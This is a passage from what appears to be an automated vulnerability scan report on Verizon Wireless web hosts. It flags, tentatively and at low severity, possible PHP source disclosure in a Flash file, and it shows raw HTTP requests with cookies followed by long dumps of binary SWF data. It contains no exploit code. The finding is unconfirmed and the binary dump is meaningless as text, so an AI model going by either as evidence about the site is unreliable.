User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 54462
ETag: "d4be-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close

FWS .......e....@..4.D.....C............Scene 1.............e....@........ .....A .....\n.L...J`.i.....F........F...........Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................... ... .......

.

..........................................................................................................r............................................
...[SNIP]...

12.7. http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.vzw.com
Path:	/images_b2c/homepage/biz_marquee_verticals.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/homepage/biz_marquee_verticals.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Wed, 03 Aug 2011 16:22:42 GMT
Content-Length: 107857
ETag: "1a551-4e3975d2"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:44 GMT
Connection: close

CWS    n...x.l.eP.L.....n.....u..5...I...tq.....    .!@p..`......[.V...T.....>==R3.......z.....L...J....9..?..x.....(..........PC..
@A......@    ..?.@..#h.h...BEE............h.G.k.....D.B..0..s`a.@..C0..@G..
...[SNIP]...
<!...&...W..D.    ..Ye>-....    Q....4..W._SKS.......+...Q....(.7.O..<?I...UI.Fs..YK.2.Z.Y.0
.,`.c..m..5;.e..8a.L)T.n.cU.....z.v....J......pf.O$g*..........).E..i..lI......u.R.-d.Z$...HH..(..6D.z...k...%sN....f@........*,....S.d.J.R....K.`M."..z-...K.v^.y.O.e.......0.:.F.j8..4.UB.q.V...Uy.&g.<....Q..d..F..;.cs5]B....$.:l1`...MJ...,.zX...$Ic.cU.yj..*...{X...j.U..R...Z.......

<...n..R..%..[4...i.?f%...R..j..1.QibS.F.U\....Y.zt.......s...|..fe.../.nF......LI.
h.vt..J.P..J+.X.c..o..$../c....*....M..l..\....X......).E.^h..$.3W....p.I.UA..x....E.....M..p?
..9.....
.#...v.DSKU..I..............R..H..J&..~dz.J.........k|...>.....P..(]V..M..2.zi`...m.C........&.8..4`.r.....''...c.j...R.x~D..]...2;(]$.K*..o[c.....*d.m4)4.D....4.\........y..7...C7.C..B(M..:...1$4.#..i    .%...w...QB..FTVT......6.....rs.............c..>.    f...<..RS..Y
H@.6.[._.0z.:E%..    `U.`K.5..v.L..."s..-P........
.bB....FG..v:.[|4k..[..M.s..:b...m2..K......{.i`0....R...nT...?.....H..H..Rt..uP.....0..:.2.......$(.o....Q$...r.._(.....p$e..k........)....I...E....|.{m....3K.+.;!>f..b.L.".U.......J......m.&...;i..~p.4.$S.58P...i.K}......^.Sr..qq.I...k...i.b`BD.y9k..    #....h].".}K..:..Z.mk.$.5..;y>~..".H'....A.G..0...'.4..dmf.
.*6.=....i
..Wr...T.......l-A.0...mVf........O.>....qS....+.    l\.C.i..M{~.a....Tb....n..q.[..`*#(.F...2.6..0..Q!.ta#.i..K...@6...".!+.lp.<..."...!........~.TI.6KG........=.....r<..Us..=......#.%fUQq......q.S.    .Xs.(.m....b....$.#.g..=0<%..o........c..."..x.;..0...B=H...2..".^A4.G0.e....P=p.>P.fA.T.d..A+... ..+._fs....l&h"f`z.^v....>...gA.......jr7#...N.e....~.{v..`..8{.. ?.D.......+`?..f    .5S\.e.7.......[....l......z.........7
.....>P.......aK..$    .../RO_..e........\j...vf.`.J.!.{.F...:..y..@.I........e.....U....LE..........t0.........5{......8....Lt....=...t..    .H....$.(;...!..    d.X...../S.4b=D..Z.[{...`......m......v..|.....U.B....a..Q.Z8.........$ooK...W..v^..5...P....%..K&...5.......i....VV...`....e.H.8Y.R.Q.!._u..)....b..d...7..0..K..v7.Hp.b..2"..q....z{..P)a...g.ok{[.*d..@..J......|.f..i.r...t[t$a.0s..w.L..H. ~.{yI.A....+.hu.Y.....F$y...C.V..Gq...Q..K6....zc..p........./r.l.G..f7..Z,.I..X.B..(=M...,....Pr.X... .|9y# S.Q....$.A.....Pw.d.+9...7.......S.Y..p..OK....2....\.......aJ..j...r.7..z., ..o.-..cb_e.....m....
:1.v........_..S..G.*.`}{t.A.....:.....o.....
..0.&.........2Y.;.R..>.F..~.X.4....X.-...z._i....._...h...........GO
.im.....Q..U...!..v=N....!8..R...mq....r...T..M...'...........H..J............`.~g'~....V;.wI.*?M....    .I....6'.m.........Bv..{....aRH.J.).yo..O.8x.1iPA.... ...ddr....X7PE...B.M...................?......!..I7$=.5..qn.C..U..6......4.`....?....Aum7%.M.z\b.............(..3...V.......
...z...$,"...i.;.0UM:....j#H:........x...q..~l7.&.Q............3G..Q...apl....q..\o:1...._.c....[+..g......h.^*....5.M*h.X.T...R}.|}...T..A j9...I...p
........._.#...h<D...1..~..Tw.JUf.`..eHP.mk.w7..MY.9.c...]..`............l6...c.zY^.tl...O.d.....B.Miq.l........E.....l...d."....$.V..31..pz.Hx@.|"..K.U...W}.3..2.....~....-.5g..{.yf_.........u-+..kIV.E.,c...s.H.._.i........h.)%....%B..ROZ.)+FE.r.<........JH=.    p......!...D..t...F...p.1..j9X......<E{.O%..?0......~..:F.....q..+.    U....#..P..1...z.#....RAR.A$2...7....\...9....(.M.;-b..iR...irV.j.%}.k........$>..C?..U.3...;.).4i...==....E.".X.o.$e..."1....,..I6%F..t#m.s....:.3J*).....Zhdx.d....i:..K.w..^....(..Y%...n....j.Q..0.X.p..]Qu..0...<=S.K.'...M+e..Y>uF.........j.SP... .m3I..M..t..Zj.......h.D{..Y-...%[.......,.+.O....HL....Ar.2.e...f~g(.._....k.....YY.VL.8...:Uf.r..N.-3.\.......e.]..b.I%..xn.h.R...Y..T.x.K.>..(q...r].S.s....ki....T..N..K]#.....a...0,W'B....:A.|....    !*r...$.
....wu...7...N...7....%.....D.2...k....#2.Y#j.M@....M.df.[.>..!=.....c.....Y."..:..w?T:.............,+E.G4..4..).GWb.S...-.&1.t..F.m.J.... r|.5...PkEO.2.J.....,/v*.....n.5=|..4i.D..`...43..n.M@.a.A..IM..G.'.. ...F`.u...
...F..1.B....#...I.....#....o.w.8....H.%.U.P..$5..`...h....#.*6 .OK.5;.6x..h...X.d..6......../CP.01.."..@
.%..6.D.....t.....>v.ER.\8.&...@@............Q.Q..UQ...M.E8x.C.Dk:+....@ab........J?..t..E4r...u..^M^Sb...T.....i..T..r..../....:......4Zjn[.\.Up......q......?.W....<]<9JZ....0Q@..........F....(...Z.    ....
s...xW8....-@b...w..&.j..4.6.i..yW....r..^W..$...s......di.u..l....'7...4U.R@...S...2.....d.....ma.:...lU<O..|..-....97....q.....;.d.........]..=..8.U.\?.Q.(......{.wIR..rC8......mZ%L.zrb..r_..k...1.K(.[I..'D%...zG:.DD.A./...m... .$l.5...*B.n._....w.<..*..:.....,...Aw    .V..'r....m.p/.r..\...@.S.ePRG.r..yi.......wb..Z.6....2.x......(..Dp,>9.P[.r.T#.......Y................?..?..#.j[.L[..'H**'Z.`4.*...D...uo.[%.;...........*.k...
..2.:.k#.......nzczx.S$<7..TI&..&.].l..by...ZB{..7..    .y.a.q.e.B.aIK.C..)....j.c....@n.i.......LR..E.U.>.....TG.!":...LO.$...4.u..H.....i...B........b...Y$..*v?..jH......q.1.`..y..X....h.mW.
......3Q:.>7K8..?..'c..|..{...}nv;.._..Zt..N..^%'..N...59.%!....#.../.9..^}R...
.ee.......~...d\...."iQ...@.. H...H..{[m..c..q.!.......2.J\.6.......B...J.O(..!......0.5;k#..f.E...(.d..N..j.....V.8.....e%.1.D.p.Zy.O...F[....t...d$....[........?.7..(..jjU....{..z..\...ddP.\.....r..'X....._am..<R.2..........l&x!e........`..v...i...IY.v.H..O......X..O.6..U..Xr.....y...V..f...H..++..J.Ut...`=N..;...Ec}i ..#.=..0B!.IE...j..N..`...D.c.s.4..N[..b...8..P.N...9.3.>..................>..C...W...Wq.2/kXu>.2h.....D.k..Z..#.19.T.Er.. ....U.n...9q.&
.e.......75t.rUT4...qn.k\......
...o(.a.....hC....yK...oLz%X.CO......cN......].......P......
v..X.l.53E...@i..m.}.....    .4.V&.........;.e.0..yj._U...P1.5.........Z.....K17Ak2.k...\.J.........k.-...}:B.5M.dS...Y.k!.>...C.^...._nX.N.XwA....p...^dQ..X.@X...n........B...B..>Y:X.....`F.7,...N..y..ko.0..........rR....z...8D...`.....Qb...3....:..C.......vsr.D;......O.J9C.q.D..(...?....eb..0.\..q........O...o?)$k....@..okc..$Vs...c..m{...Y^+.n..}Hl/....    :C.._....{aa....;...d.r.V.Ku.{.....R.N.]<.Y..H..    ...$.... ...>....%.4.eyuj.......e.......-.It......../.m....(p......U].....5,M......ek.m.Xo......a`|..6 t....<......g.1!.....!........Q..R..Xs.K.'....l1...6....).>.w...ZV.5..r...H..0..:..}...Zx...VE[G......&.r.`.U...[..o..@,.j.3.]........8...PQ.......8.............r..m.v..`p.....k.G.U...8!.4T....).P....t........#....U
...*.sv...c~.i.\.(....{........w)...~.i$.#H.*.C ...O..hn..7~..5:>..gk.h..ROS..L:..P..Q.A..6;.....AV.1....i.z....BT.-.....S....>.(lv.......J.,......~.p.P.d...2.y....a.*,.;...?..j;%.....-....e...,.T.E.A
......=....{{..o...f..T.......U,.0.T......X..y@lIv.[.oc.mn..ah..B.....Z..\&I.0s...>.'.I....{..ok.nqj....J...%4...../.
TD];j.I....S..T..b.p/..}..,.J..M..l....X...W..w.]....r..Q.4./..t;L..!b0$S...pN..a.*..M.t=....vM.T..\...O..U....e...q|WL....9TBx'.C.\.a.......Dq.d.\.,E.....!.>....{.-q...$.eG.....R.l[(>.O._...".i.~$z......X.b.c<...........ad..<..P..&.,...a.'.Q..T..@......
$...2..."..$e.f]y~l    .@......m...s<....J_...    .....P@...v6.{c.<    .h<H....-.h....X...K5.n...%.s...N.:..#.    Y....d6.`}....,
..~H.......W.........y8.n..c[$...L.IQI5-\ ..D.........<..:......O@*2..d.Ce...........u.......##...4..x.7.f...,...3.....J..}.,z.k/.&q..g...I(...,..8..d..)*.A.P.S..SQ.=.g...J8.=....O....>...T..l...........D..#.]....5.$@....#\X.[l..&F..d...8.V#R|5....X....[a&...E...,..ctnc\.6D.o...Vc....\n.I.$uSrd.J.Sk.I....o.9&.....a.K.C.M...k...~`.;vS..g..^...)..c.|MH(g.5.9..: .......G.Q.FUE....u+ 2!.I.b..M...C^.P....~3p...,3.    cl..jS7....i..r.X.d..TnE...o.....w.Y3...N..2O%.<..L$.R...2\.6..G4....+$.6c..y..r..h+.8g4.
..P.J.....^..p...V'.-J...A4....K.#OvK.u;.y.....L....U.H.. ..j."...'Ee.{.k#. ?PPv.<.......K>....%Z..PI.>.^.i.....MM..E..l=jAV.cE.gL......faRO.L....    .g.B..R....H..+.%d..^Y.q.T.-GU..!......0f!....+8$.XO...EE.[....!...2.8k>t,b.=....Q...w.....M[b...._..O..Ny5&gO5Sd......2.A..?$.....l.F.72..8. ..S2.V..'..r...Z...$J.....!b..{.F.p......"Z..*.k.o.......(u.g..~.@LHQ....x=.]..v.b....@l^,<'I7.d.vVk'....t.UyD.qT..T..S...W,..4...s..."Exb.%.....Q}..1.....%...#p..\G....<.Qd..j....@.)<......)...1Z<a..
(x...r...M..D|.i`w.RV@.1.J.R.K..............-t....@..:..p.!.zf.K..).4.wv..K.YF..ch.U*.8M$Q...1c.T0..]d3..z.m..KU./+K.Z.......06..sc...Tr~!..j...J.z.C$.H.+.vR9......r.......=$..e....%.g.T..r....n...U1.L ..,.1..%...A.3.Q=D.UM.h.7gyXX_Lr....    ..6`[.86*.,....XS.\F@..G.5.n.2.
.X....>m.&P&...d..s.$256L...Ynf.......1b...lVW.s....1.6..%..M.G.Ym...8..{\.
jz.e
...l-d..Y..C.*....B@.Z......S-)....T.'.I.Hu.E .,.....Z...r./.
I$."i...C.............Pve...\...xF.....M..j....Z.7....U..#0..i...U...5Q5Ma.3.c...-$.j|......}4.b>l.v..r....0.|.....v..*..|.....qX....X.+...4.n....H*K.x..-2........e. .AQ.r....B.P..!fb.Z...r.Q7..........9..|.KSG ....<...x.......WfW...dwn...N_.x....Il..h_..p.q...W
...?..._.6.....VY..=.1...KO\..e....,0:.J....*o.......l.u..8.<....k[7...J@..."t>~d...T....@*.).:9s..J.L..l.4.+V..)D..@..i....z.....L.....).f/..    .Ne.aA.p.4,..G...u.-$q^+..p........c...,.tt.k.j<..."WB...a.*    l.`.A".[r@.8.4|e..VcD........|.M.I...o4.i._M.......Y>.I.XED...,Z.&......Y..A...a.#...h..'4.\....t.w.a....Z..l..12..2..F...@F..o=......(..M.Q.....0......
z.P-......%.KA..2K.fuS.h...Hi....Hb..n.X[|jo.e..8......k*.h.V....e...e7...D....f6:..9-.......F.-...H.*...@.M..F.OM....e..z....O.....R....hDK/.t....Y.../(.W1@br&.....z.V.....T.B..].=.....4.[\.N..U..[?....;.8....$..:i..".j.b......k9...y..../.T...*.<...i....$u*..!..j...6IT..?.G...EG.Y..E.v...TrEF..$L,ok.ts.z..f..X.!<..........Y.}./...<.?w.:
H....,n....X.D.@.... .^........MR..9.&.x.....0.....]...N....m..9...td...B..5X.W..)#.V..'TnEF...|.ol&...&I...i...:....hYRVV...cvkZ.{.}...?{#...JM.
...#.r.9%.M.P..;.....$....9S..M?4..A......T.yS.c....m.&.^.....@.J..R9G...........
....B...:{...7.sN..Qy.z+.....-..n..(9..kQ{...z..SKJ.._....m..]......Nt..R.....coB,...h...K......zM:..F%.......m.../.p.fr.<....P..?...q..R...Dq..........H..*    .b-;^..X...8.b!.OuY..#.)UH..ck...Y..=....<....+.k.(..5..[.....(^D..bX9'Ct...6*..*B.....7.    ....'..;..UA...PLpVJ    ....3......q.i\]$..m"..F..........    [.{.$.H.04......GP.$b.cn....|p.Q........#+FX.&.PF...V.....$@J..x....I.]..8D.S."Y    mD..`C)...m...O2.H.e...^.yS..#.M..k..$...e...O.......Qi....).V...-~........k.RX......'..U.H.;...q..[..u.M.....g..w.X....,......Qk\.[`...#*".5Uk....}....)..8.bl$....
..v.......b29bzm..m..1-..........G..K    .}~...>)...`.(.e=....AmZ.H.h.......0.M71.;..h...#{.|.....
{..a....6..    ]...|..4.1... ......(i..@T[.o.."...*.f.#]^.f;....i..i....3."Nq.*...4..6...H..muH..0....k..E.2 ...k..-.J...l8\K .9./.k.....u.+.m.6...f`.......t...{z....MqB...P.?U.....g....../v..oU..Q%.8.-*.....>...n..;....J.uf.#.$.0.c...p..I....a..q..L5..-.....w..rC.1V:5.......!e.........]@.e.1.O....U...n.5{.`........?....8S0v1...l....~...4...J..}:.....a.....(M......|$.....}Km.X.&s{#.%....p..
.C.2......6.....l..T8R...N.nl=.\....`'k#z.z{c..4.../`=O..CJ..!.Y...R..#.r/{...I......$r..*.A.....!`.K.'O..?...K...i..==T..9.[.C|.]w.Y...U.......l.....k..a.(De2X......'q.E...k......6..ar...{ .D
...:m.|%.3(....C. ....p.]Gr=..q..Y.,...b{.|.p.#...#B....#..#.....e.p......7t:..p..../...=...S..~.....T6......WK..(.....'A..v$.......7b?...[.....K...@..E.H.~.>....|c%...[..v..8nG......)^...<...HP...C.lzc$4.....U..Q.=p.....s..."6qmZ.N..s..|....a......A.==p.a....n...bI.C...P.,......[_{_.qo......q..E&..;e.Lh.......+...Q..A.A...o....V...[.....a..p...s.d...f........9........=.._cU.D.....gmM.<.>...1...h..e..U..../..$.v....^UT.E.*H5.G....PY.}.......n1...:....$Y....\...k..>]U*...=
.V*7...../'*.Q.TH..wv.<.q.Z..Q;.-.....(.B.ENZ..X?x#.|...4/.R..N.. .!S...y...\8.-.....`.2..
.].h..%...[p....[.q...\...?.c....H...W<.*....&...*...=n.c..=D.$......r.:.K..K.......~'.4..MI.4HZ.?.:L.ER#L..6./.....3c.=<.....).3..u.m.u.~`.6.%....t..K.58......-....aT.+..$....tk.@..0.t....g....X.>..)Y..A...@...A[........S....eUs....Lp.....':...T..E\.%c......bfQ&.idA zj.2.7w(..N.c.6..U.....g2.....D.$.>G../d..B.0RA...\...*I.X&....c.krE..Nl.#u.c....3...!.$.zg.D.M.HI$W..s......m...g...P..g.0..fRC;O&..hT;.......".1.......53.....l.&.t....SH6.w...HB..    ,Z........^!.g.cH..aW.O.f>.fi|...R.............a.P.....6..F...j.l.,.4..).!.d..&..w+...yYF."......*...7.|...db.f....v.....j%....c.%..V.!._@....k..j8...... ..xj    /...hi-....3.....n...i..f.....!3.(K0.F...t.Xr..UYOU?.=...g .J....M2...'.|P.hx......r..jr..n.A5;,.M2.P......f,....ld0g.9.U.qE]P.T...Y..P.Z...2..[..fP5lm.5..!.....\g..7.*.7.p...,3<.x.6[..T.D.t...[....S.4.......JqWI!...f.D7m.S.!..[....(P.HT...D.R.u.J.7.ESZ...IRX.!l..Y...Z.....)y ........)..[.|.....qg.*..".&iAI').....i."...4.....^..-BI/.|D.b.*..+..M.6Y..L...Y..I`.Z.....8.. ...l.j...#.5
......F.[iWf*.iUb...Q..c..2.ViZ.fB.;.l.S....-.#..X$..7..I.].b....s%.-
..%+P...
.&.sO..5.)/t..J)P..cX%...2.a.w..........s*|.ZZ....8*....X.#.).........;..V.1E.80QGH.+.Tc.g.".DXu.H7$.AS....Q..2....................,lF.\..J...(........$.|Y...Y.D....`drK..........p..@.&...u....Y...).E....Y..X.J.0..M...*....G.S.f...9..p...\..]U....-.."...>...$u..,.4.5^_.m...3]4...g
....X...J.....L`..^...!......*....F.$..Y..y.........|.ao|H....J./..?.i,K.k...#*..)1...4.@..6....YH.RM......I..f*.T.........e&..    5`.fL...#a..O.c...~C..WQ...`+s|..J......S.B)i..u.2#$.e...U[B..=.<s.C.7....2s...K. .JH......2.]...QP..K...../..0....mCD....&<.(q3....
$t$i].sd!c/..8s.:.8....e.O...R...U..U.hB..;.v..lYT.3!p..9J...R..uwfZ......K.#V.(.U    J\.%.u...t_tJ..$..1..\H..QS6..<..8....|.......xg.N.#.O%......x.]E.........[K..$.u.|.(...-..Ry...,.T$J..h.
..1M........K(n!...t.dX.!ME\..u..F.....U.M..T.[...........':x>..Z..fH..u    .%.n......F.B..f.H.l.    J...(Z...Za.P.vAZ...P.L..%J...>..D..I..\.....f
J..gUl+kY.p*.<..t...nw+!.E.Y.|Y?..R.Q.R....OR.D...f......@,.........*.L.t.E,H..7i%.s..6. ...........7..8.8......y.yjj'O..=.C.4..2.....FJU.N........R*...A...%[&&.......'5(..jy..../.../.|E.J,.s.4l..Una...
..hi    a}....G..O][5G.i...5.....EQ...i.......!.....U.
s,.p.S,...Z....3...i@@+.....l.9.8c)....X^..#<.-yY..T.|.]t!=d6..0="..gL..T    re$}.. ......GQ....J.-_.UQ}.>..........%..4y4o.....k3H.:-.$(...>)..a.>.e..+.9J|6...\.9W..z..%......&.^^......rJ...Q.\..VaQ.\B..ZSC0.....V..H...q.vI(.Z.....y......b......>d....n..g....P..c}.{........v..Z.
WV....I..>g_.t.A.J.k$!.3...(.b.}...Im.....^..8...........@..i$...:n1.y.4..|W.H.8...F.._}E.$..
hgI...vU...c.{..jq.8..H.V........5.2H.s...=..q.4z.....Q.V.$.....H*...k.{`...._2E.$....{.......H&.8..2.E.P.X^.=?....$@..f`...4.......<.:M.i.x~.....&...&5..........mu%..PI!.n...-...i...2`l.....1..p.i,R.9S0s....\.;z/q.>...*..<....)^..'$3R..#JnA`......*Jy..m#b..|    ...!..U#.}.d=/.Q.UT.".......@..6....Tr..L.T.[....8.Yb.\,.$..=...v>...cJ.g...j.nl.D,.^......".Z+..$....}.m..~]-8...l..{....)..B.i.m;...vB..cR5)..2..    .O....A.FP.-N.s.....|
ZaT.,j.P..w......:..!..w..............GK'..}#..j.t.M..(...m.`q(..[9mh.I.`A....z......dn.T...a...Z2.a.|....s.......R..d....RCP.9e.y.O....[..
vh.y.lM._p.K}..h...#........;.?\I........U}..]8EP.PR..N........h....R......_.......0.L........r.QL^X..Q"..Y.N......W...r.Y.*5......3...(.C'.t....D..P+........u9..T.a..lI.....Iyh..3.G.=....gf@.m(.u..=...4.?~0..uy......}.a.O..%\.k........q.L.I.;.......fc..J.Ci...........x.....t...T*........r@......(......l..9.X%.q... .l!4.$},..%...P}....![\.0A..Y.v ......B..
...C!7....tL.u]..nJ..$wS....D..B7....z.3..C..hLLa....n5n}..?..n..w7^...WY*.#.K]....
RA.....#}.{...M....UYu.y..[.8Z...e..`u.......,..).N....o..{Y.f...0...>.7..u8wzB9.K.....6.....)$nO.....I.......6R:......iH..L...TZ.....S.8R3..T.b.....y...J50.OQ...<...#.I:...;..N..j,.~`..Z...8..;0.$..#H.Y....~....U...rM....o.W.......Sc.....B........
CfY...Y....o..a..V.........ly....U.;.;....J... %...'...1.G..?....Gb.Y...-.|d..Q{X./c.)wp.nJ.z]}.....6G......#.q..Q...B..X....$.LF..0.:.zoa..%]B.U..E...~...\..W.R.....q..{.UI........K.J.[..XvMKm=.U.\!U.6..-....Clz-.<.X.-.Z...0..    %..u2.7..s.....6/....y    ?y.. ..........`...*<.[1Mje'{.&.}.a...`......}..&#}@......_q..?lZ.`....H...).=&MA.(..} Vu.V2;"-..........QT.Au ..........8v@>Xn.z.}..L....`X    ?B....|C.......... ..U....8..aG.....+..@.....E....'....P.R..........p$...l...H'.q..H....U.........hX......2...0..<..f!.T.5.9...k.............jP..6.....Xx.$.....Z\..
.A....AkX....?_2...>n............f2"..CM....(.L......9..    5_.fl.[.i...+$h^. .,UEN.iIOS.t.2....L..v{].,.n..=.V...>@.Wy?H..h..+*.r...G.#...i....T..~.G.>...!{?.Ac..6.....s..1u....2....+i...l>...............!r.feee.2.(.7.J_.k[.3.)9.$.a..yjAr...nl.....;..).
'.RK..*.a..c...-@...G....7..xO......e..M..=<....i"I......:.,.n....Q.f.%.A."?Ee..2.....u._..........J.V.+!.a%.AG..*....X....~@..R6..0...~..\......)..2...?R.4.GN.F.{..)P..I ..@.1..:I([tD.\....NH............Q.k\.`I(<r....y.;.C.........s.....gvbA..F.*P*s?+.......'..4..n62E.......lUO.....I..3.Hw...uT..T.u...!.#if-}I..(\0.N....s..Bx..-g.B.W....$.&*.."..t...#......D=..d..(....,j.N,.,.\...s.....z9"U.Z.<M@u........e.F..)i.....Z....<...+ wM.V4....M.'.../.(..J\.".4\i..N.U..Q,.(.#..^.....h...Rm..7......>9....|g+...4f..(.).....M+..?,j....'cEZ...IM.9i....C..\.\1w=...XV..6.......U+I.....<..%.R-.C.,...<B....5...Lk..o...g...t.UQ..j.k.Ib.V.m".Z9    .....W.<-.3<.L. .\..A..W...K;..*a.....
..0ekX.x..8k.(...<z....0.T.. g
%.B.`....7,..@.s..K..y.U>p..N........s$r.k.T`P..FP    o&&....M...c..,J...r.].....    `"0...X....Pl/`_ ..h..:^2...ya....<.....P.M.....U..;.N.~......;..j......&...r..K......y..qs|lF...r.!....../.a.i.L..;.@.HL.1.uD.E.....U....*.a[....:.S.....Y......b[f77..^.)T..T.
RR.2A(
...B...E.;.'VT...0.AL..CdT?..w..O..9b...5...j.......5:J....*.I.n6.{...2...l.j.k...[    s......e<...2..`...Hc|Ney.Q...t..?"....iYY.U2s.k;...#.@....li....^.8Y3..&....g..P.X...Q#]E.@%.......O\..l..B.&.Z.....-...l?..a%..x...R.......M>C..T...,.._..5CU....zpX......s..'..uF<......f.|,3<<.........$Y.6$.OLO.x3..<.-6SE5...SXe.e*..&.)..`.P=1.rh)2.(.Q,t4.T.c....8..G....3X(....$.mr..=u.C.9wS...(....d.XK..P.KK......j.o.x..k!...s*..i.d..2.E.;Ke.#*6KJSs....qm....?2.~5.....6..J0...V!...E
..^G..2.v..z<X.7.!Q.xM.MM..S .>..CF.....FERH..CyT.^..~.e.9,.]..G...\3.*.4..3.T.J..f..,....B.%...Y..$$..iL..Bue../0.z..r.BJI*.N[.x.....@..".....^-gT.s..rSd$|O..
J$....4D.X&.I'.6...Pz.'t..x.G.QG....H.4....[.......C.5.\... ++.b..@$.N.P2.bv
@..ho..d..>....Mw.......M/.%....UB.`.c%.,    aK5s-..(Bp.(..%    ....T...OBQg..R.5R..Q.D.P`.c....(8.%.4n%...7\......E`....-..z<...8:.._.jhc...9.c.C,.H.K<1Vi...'q=Z.d=DL..&.o
<5...<..L/S.T.YAKTH.1..rex....
#... .....j9pR+...XD7"..."..jb\.......Sd...JPR.G_4`[.$..>-...+.R.>....%/. .......gq.lR..A,k.....-evQ..[X......c........'):i....@V.f.@.8....\....`...~x..e7.p...I...S).b?R0vI*..D..*.Hy.........T...?...=NM.V
..o...2.:....+J.,.IV..A.....T....D.z.qZ..mcA......    .s.gGimx....F;.....?.[..J<.....,..]N...t..z.........~n..x..T....y$I.;....6.UI.......qq...*:.9.f.H..1U..4....B.4$n..N ($...d..D.<b7
Lj..XyT..J.......+B....Wis    ...0..i,r..,.'.....51##f.P..<I8.ZFf.....7"..K.......jVR..h).<*.J...p.<|.../{....D....{...x...:.......E.l..~....<-.L..r9a.r...Z..L.Vzy.x....).G..@k....ty..Kr....._........>.zaZ..~{ ..X..s.Y4.=.}]6....j..M*....R.....u>..O.........z(........!T.^.K'Xt..G.;...#.......0Z..)1$.]l..8?...?;4|.....d...lnT._L0.IX.1Y.y. .......^..S...C......{a....$.:..S.....F&..e[*@    .H..G.....H@e...fshd .p.&....|3.U<.8f}7.n....k......j..M1...'....+....F8.L....a"......H.lX.S.[...L.i.).FR!y/...i...pT=*.....^b....-..q8iZDB....
GP=...&,....w.S..#.Y...s...vp..{}.KV.....:~.].....c&.6[F....M.-....7.f..V..DG.`..t..os....@.N..'.?eh.N.r.....].y.oA....T...vEN.s.S..3"HUt")v...D..=...:....E%........0'..q48d|}.....,.e)..p...._kc.&wZ.y9..)..=..l?.R.^    %-.:.T.,...}..    C"..r.....U.>........8o...U.4.^@....{.....B.....$W6.z.|.P.s.P...F.bP~S...n.... .......+.!Q.Wt?..h.c..X.7......W.p..HBbY.
G...{.r.....P..~Z.[{`x.TN.Z.X+....>.....B86.Lan%[..r....I...l&3$f.........l5.Yf0.2/.....:..Oo\<...~..H.F...d...6..:,...bZO...8.`.kUe.    ........g.Q*..m{o.....u..B.*.um.....= ..>....47..%.......m...10.X2....U....BH..Q...(............(K....e.oS....Io~...:.M#.,v[.#p.P...Z...YCo}..F... ....,q.u6.m.....=.1".....".>..s...y.A0....'..........b..-...[....R....V.A/.p.....B#.F....oL.p.    .....<..],IK...o..%hB$H...27e....26. y.k/.{.\(.=...X.!;.m...._..t..#.r.]v......bk..k. .....a..@v7b,6.\....j....Aq....4.F.K..<..'......}d3...z.7..'..mm.&...X....X#M...m.:.c....F.J...p5.......P..."n..kt.n.T..d3.cpR/@n/n.K.G*...p.F......C.P.....1..g......}&...#.~^.....0...5$..RM..ba.o...=.CK.k..T.... .....V=....'i.....4i....E.....y.^M.b....lHH%..V..U.mG...5.P......t......v....?o.../Yf.....x.M#.F.4 .G..{...<.#.[.+..._.......,~..p=?l>...b...o.s..ZZ[O......DMy.}..vp.T..g......m........T.:..a...9.4z.t..-...>...Ln....,-...?.$...G...<..8DKw..)k.X..
.0B......g:b.....;.eT..&....    ........j.Z.PY.........i.Y......G....8..jWg1....H],@p..{\\~..G!.1../...\.2..4...F.6..8/..dC`    ....G.q6.6..A..s...a.e.g.uI.6F..^D..8^...9nh$..F#....A.*...#pH.?.~..<$....K.J*!..^...G;....4...p~.Uc..^......
.R...1B....E....c.<c..<D........Z... XT........$..`.A./.?E....LPUeM..,d.%.F...*..>.$u.%.....9I...}.`E..^&....(x.)Q...GO....5u2.../.].w.......T..Q..k..
..e0....p\kk..........K..&...J...'..3...,...dUS.F...|.V[...3..R>..d.Q,.A. .$._I....#X.^.o..]+..WK-)..$LAw.Q,...|..8...;...hA)<C{..@.AQ4...K...
.D.R<.j....^B....c.....3.kS....s.bx.zj....F<...H....n.t2@.p.)%....s.RCW
